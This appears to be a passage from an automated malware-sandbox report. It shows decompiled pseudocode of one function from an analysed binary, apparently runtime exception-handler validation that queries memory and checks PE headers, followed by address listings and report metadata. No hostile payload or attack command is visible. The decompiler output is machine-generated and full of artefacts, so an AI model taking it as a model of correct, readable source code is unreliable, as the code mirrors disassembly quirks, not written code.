                                                                                                                                                                                                                                                                  				signed int _t110;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t108 = _a4;
                                                                                                                                                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                                                                                  					L3:
                                                                                                                                                                                                                                                                  					return 0;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t91 = 0;
                                                                                                                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                                                                                                                  						_a4 = 0;
                                                                                                                                                                                                                                                                  						_t57 = _t76;
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                                                                                  								goto L9;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                                                                                                                                                  								L20:
                                                                                                                                                                                                                                                                  								_t63 = 0;
                                                                                                                                                                                                                                                                  								L60:
                                                                                                                                                                                                                                                                  								return _t63;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							L9:
                                                                                                                                                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                                                                                                                                                  						__eflags = _a4;
                                                                                                                                                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                                                                                                                                                  							L15:
                                                                                                                                                                                                                                                                  							_t81 =  *0x4141f0;
                                                                                                                                                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                                                                                  							_t58 = 0;
                                                                                                                                                                                                                                                                  							__eflags = _t81;
                                                                                                                                                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                                                                                                                                                  								L18:
                                                                                                                                                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                                                                                                                                                  									_t62 = 0;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									_t62 = _a4;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = _t62;
                                                                                                                                                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                                                                                                                                                  									L59:
                                                                                                                                                                                                                                                                  									_t63 = _t104;
                                                                                                                                                                                                                                                                  									goto L60;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                                                                                  										L46:
                                                                                                                                                                                                                                                                  										_t63 = 1;
                                                                                                                                                                                                                                                                  										 *0x414238 = 1;
                                                                                                                                                                                                                                                                  										__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  										if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  											goto L60;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t84 =  *0x4141f0;
                                                                                                                                                                                                                                                                  										__eflags = _t84;
                                                                                                                                                                                                                                                                  										_t93 = _t84;
                                                                                                                                                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                                                                                                                                                  											L51:
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                                                                                                                                                  												L58:
                                                                                                                                                                                                                                                                  												 *0x414238 = 0;
                                                                                                                                                                                                                                                                  												goto L5;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t77 = 0xf;
                                                                                                                                                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                                                                                                                                                  												_t77 = _t84;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t94 = 0;
                                                                                                                                                                                                                                                                  											__eflags = _t77;
                                                                                                                                                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                                                                                                                                                  												L56:
                                                                                                                                                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t86;
                                                                                                                                                                                                                                                                  													 *0x4141f0 = _t86;
                                                                                                                                                                                                                                                                  												}
                                                                                                                                                                                                                                                                  												goto L58;
                                                                                                                                                                                                                                                                  											} else {
                                                                                                                                                                                                                                                                  												do {
                                                                                                                                                                                                                                                                  													_t68 = 0x4141f8 + _t94 * 4;
                                                                                                                                                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                  												goto L56;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t69 = 0x4141f4 + _t84 * 4;
                                                                                                                                                                                                                                                                  										while(1) {
                                                                                                                                                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                  												goto L51;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                  											__eflags = _t93;
                                                                                                                                                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                                                                                                                                                  												continue;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  											goto L51;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										goto L51;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 = _v32;
                                                                                                                                                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                  										goto L59;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                  										goto L46;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                  										goto L20;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									goto L46;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L16;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L16:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L18;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							 *0x414238 = 1;
                                                                                                                                                                                                                                                                  							__eflags =  *0x414238;
                                                                                                                                                                                                                                                                  							if( *0x414238 != 0) {
                                                                                                                                                                                                                                                                  								goto L5;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  							if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  								L32:
                                                                                                                                                                                                                                                                  								_t100 = 0;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                                                                                                                                                  									L34:
                                                                                                                                                                                                                                                                  									 *0x414238 = 0;
                                                                                                                                                                                                                                                                  									goto L5;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L33;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									L33:
                                                                                                                                                                                                                                                                  									_t90 = 0x4141f8 + _t100 * 4;
                                                                                                                                                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                                                                                                                                                  								L28:
                                                                                                                                                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t81;
                                                                                                                                                                                                                                                                  									 *0x4141f0 = _t81;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								goto L25;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								L25:
                                                                                                                                                                                                                                                                  								__eflags =  *((intOrPtr*)(0x4141f8 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(0x4141f8 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                  								__eflags = _t58;
                                                                                                                                                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                  									continue;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								break;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _t58;
                                                                                                                                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                                                                                                                  									goto L34;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L32;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L28;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                  							goto L20;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L15;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					L5:
                                                                                                                                                                                                                                                                  					_t63 = 1;
                                                                                                                                                                                                                                                                  					goto L60;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L3;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  			}




































                                                                                                                                                                                                                                                                  0x0040ec57
                                                                                                                                                                                                                                                                  0x0040ec5a
                                                                                                                                                                                                                                                                  0x0040ec60
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ec7e
                                                                                                                                                                                                                                                                  0x0040ec68
                                                                                                                                                                                                                                                                  0x0040ec71
                                                                                                                                                                                                                                                                  0x0040ec77
                                                                                                                                                                                                                                                                  0x0040ec86
                                                                                                                                                                                                                                                                  0x0040ec89
                                                                                                                                                                                                                                                                  0x0040ec8c
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec96
                                                                                                                                                                                                                                                                  0x0040ec98
                                                                                                                                                                                                                                                                  0x0040ec9b
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9d
                                                                                                                                                                                                                                                                  0x0040ec9f
                                                                                                                                                                                                                                                                  0x0040eca2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eca4
                                                                                                                                                                                                                                                                  0x0040eca6
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ed0c
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee6a
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040eca8
                                                                                                                                                                                                                                                                  0x0040ecac
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecae
                                                                                                                                                                                                                                                                  0x0040ecb1
                                                                                                                                                                                                                                                                  0x0040ecb2
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb5
                                                                                                                                                                                                                                                                  0x0040ecb9
                                                                                                                                                                                                                                                                  0x0040ecbd
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040eccb
                                                                                                                                                                                                                                                                  0x0040ecd3
                                                                                                                                                                                                                                                                  0x0040ecd9
                                                                                                                                                                                                                                                                  0x0040ecdb
                                                                                                                                                                                                                                                                  0x0040ecdd
                                                                                                                                                                                                                                                                  0x0040eced
                                                                                                                                                                                                                                                                  0x0040ecfa
                                                                                                                                                                                                                                                                  0x0040ecfe
                                                                                                                                                                                                                                                                  0x0040ed03
                                                                                                                                                                                                                                                                  0x0040ed05
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed83
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed07
                                                                                                                                                                                                                                                                  0x0040ed85
                                                                                                                                                                                                                                                                  0x0040ed87
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x0040ee68
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed8d
                                                                                                                                                                                                                                                                  0x0040ed94
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed9a
                                                                                                                                                                                                                                                                  0x0040ed9e
                                                                                                                                                                                                                                                                  0x0040edfa
                                                                                                                                                                                                                                                                  0x0040edfc
                                                                                                                                                                                                                                                                  0x0040ee04
                                                                                                                                                                                                                                                                  0x0040ee06
                                                                                                                                                                                                                                                                  0x0040ee08
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee0a
                                                                                                                                                                                                                                                                  0x0040ee10
                                                                                                                                                                                                                                                                  0x0040ee12
                                                                                                                                                                                                                                                                  0x0040ee14
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee29
                                                                                                                                                                                                                                                                  0x0040ee2b
                                                                                                                                                                                                                                                                  0x0040ee5a
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee61
                                                                                                                                                                                                                                                                  0x0040ee2f
                                                                                                                                                                                                                                                                  0x0040ee30
                                                                                                                                                                                                                                                                  0x0040ee32
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee34
                                                                                                                                                                                                                                                                  0x0040ee36
                                                                                                                                                                                                                                                                  0x0040ee38
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee4e
                                                                                                                                                                                                                                                                  0x0040ee51
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee53
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x0040ee54
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee45
                                                                                                                                                                                                                                                                  0x0040ee46
                                                                                                                                                                                                                                                                  0x0040ee48
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x0040ee4a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee3c
                                                                                                                                                                                                                                                                  0x0040ee3a
                                                                                                                                                                                                                                                                  0x0040ee16
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040ee1f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee21
                                                                                                                                                                                                                                                                  0x0040ee22
                                                                                                                                                                                                                                                                  0x0040ee25
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee27
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ee1d
                                                                                                                                                                                                                                                                  0x0040eda0
                                                                                                                                                                                                                                                                  0x0040eda3
                                                                                                                                                                                                                                                                  0x0040eda8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edb1
                                                                                                                                                                                                                                                                  0x0040edb3
                                                                                                                                                                                                                                                                  0x0040edb9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edbf
                                                                                                                                                                                                                                                                  0x0040edc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edcb
                                                                                                                                                                                                                                                                  0x0040edcd
                                                                                                                                                                                                                                                                  0x0040edd6
                                                                                                                                                                                                                                                                  0x0040edda
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ede0
                                                                                                                                                                                                                                                                  0x0040ede3
                                                                                                                                                                                                                                                                  0x0040ede5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edec
                                                                                                                                                                                                                                                                  0x0040edee
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf0
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040edf4
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ecdf
                                                                                                                                                                                                                                                                  0x0040ece6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ece8
                                                                                                                                                                                                                                                                  0x0040ece9
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040eceb
                                                                                                                                                                                                                                                                  0x0040ed13
                                                                                                                                                                                                                                                                  0x0040ed15
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed25
                                                                                                                                                                                                                                                                  0x0040ed27
                                                                                                                                                                                                                                                                  0x0040ed29
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed2f
                                                                                                                                                                                                                                                                  0x0040ed36
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed62
                                                                                                                                                                                                                                                                  0x0040ed64
                                                                                                                                                                                                                                                                  0x0040ed66
                                                                                                                                                                                                                                                                  0x0040ed7a
                                                                                                                                                                                                                                                                  0x0040ed7c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed71
                                                                                                                                                                                                                                                                  0x0040ed72
                                                                                                                                                                                                                                                                  0x0040ed74
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x0040ed76
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed68
                                                                                                                                                                                                                                                                  0x0040ed38
                                                                                                                                                                                                                                                                  0x0040ed3b
                                                                                                                                                                                                                                                                  0x0040ed3d
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed4f
                                                                                                                                                                                                                                                                  0x0040ed52
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed54
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed55
                                                                                                                                                                                                                                                                  0x0040ed5b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed3f
                                                                                                                                                                                                                                                                  0x0040ed46
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed48
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed49
                                                                                                                                                                                                                                                                  0x0040ed4b
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed60
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ed4d
                                                                                                                                                                                                                                                                  0x0040ecbf
                                                                                                                                                                                                                                                                  0x0040ecc2
                                                                                                                                                                                                                                                                  0x0040ecc5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc7
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040ecc9
                                                                                                                                                                                                                                                                  0x0040ec8e
                                                                                                                                                                                                                                                                  0x0040ec90
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 0040ECFE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                                  • String ID: 8BA$8BA$8BA
                                                                                                                                                                                                                                                                  • API String ID: 2850889275-2911327915
